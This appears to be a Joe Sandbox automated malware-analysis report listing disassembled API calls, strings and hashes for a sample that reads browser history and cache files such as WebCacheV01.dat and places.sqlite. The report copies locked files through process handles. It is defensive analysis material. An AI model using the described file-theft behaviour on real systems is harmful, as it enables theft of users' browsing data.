                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                              • String ID:
                              • API String ID: 2911713577-0
                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID: @ $SQLite format 3
                              • API String ID: 1475443563-3708268960
                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmpqsort
                              • String ID: /nosort$/sort
                              • API String ID: 1579243037-1578091866
                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                              APIs
                              • memset.MSVCRT ref: 0040E60F
                              • memset.MSVCRT ref: 0040E629
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                              Strings
                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                              • API String ID: 2887208581-2114579845
                              • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                              • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                              APIs
                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                              • LockResource.KERNEL32(00000000), ref: 004148EF
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID:
                              • API String ID: 3473537107-0
                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                              APIs
                              Strings
                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: only a single result allowed for a SELECT that is part of an expression
                              • API String ID: 2221118986-1725073988
                              • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                              • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                              APIs
                              • Sleep.KERNEL32(00000064), ref: 004175D0
                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotificationSleep
                              • String ID: }A
                              • API String ID: 1821831730-2138825249
                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@DeleteObject
                              • String ID: r!A
                              • API String ID: 1103273653-628097481
                              • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                              • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@
                              • String ID:
                              • API String ID: 1033339047-0
                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                              APIs
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                              • memcmp.MSVCRT ref: 00444BA5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$memcmp
                              • String ID: $$8
                              • API String ID: 2808797137-435121686
                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                              APIs
                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                              • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                              • String ID:
                              • API String ID: 1042154641-0
                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                              APIs
                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                              • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                              • String ID:
                              • API String ID: 2947809556-0
                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                              APIs
                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                              • memset.MSVCRT ref: 00403A55
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                              • String ID: history.dat$places.sqlite
                              • API String ID: 3093078384-467022611
                              • Opcode ID: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                              • Opcode Fuzzy Hash: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                              APIs
                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                              • GetLastError.KERNEL32 ref: 00417627
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ErrorLast$File$PointerRead
                              • String ID:
                              • API String ID: 839530781-0
                              • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                              • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID: *.*$index.dat
                              • API String ID: 1974802433-2863569691
                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@mallocmemcpy
                              • String ID:
                              • API String ID: 3831604043-0
                              • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                              • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                              APIs
                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                              • GetLastError.KERNEL32 ref: 004175A2
                              • GetLastError.KERNEL32 ref: 004175A8
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ErrorLast$FilePointer
                              • String ID:
                              • API String ID: 1156039329-0
                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                              APIs
                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$ChangeCloseCreateFindNotificationTime
                              • String ID:
                              • API String ID: 1631957507-0
                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                              APIs
                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Temp$DirectoryFileNamePathWindows
                              • String ID:
                              • API String ID: 1125800050-0
                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID:
                              • String ID: d
                              • API String ID: 0-2564639436
                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
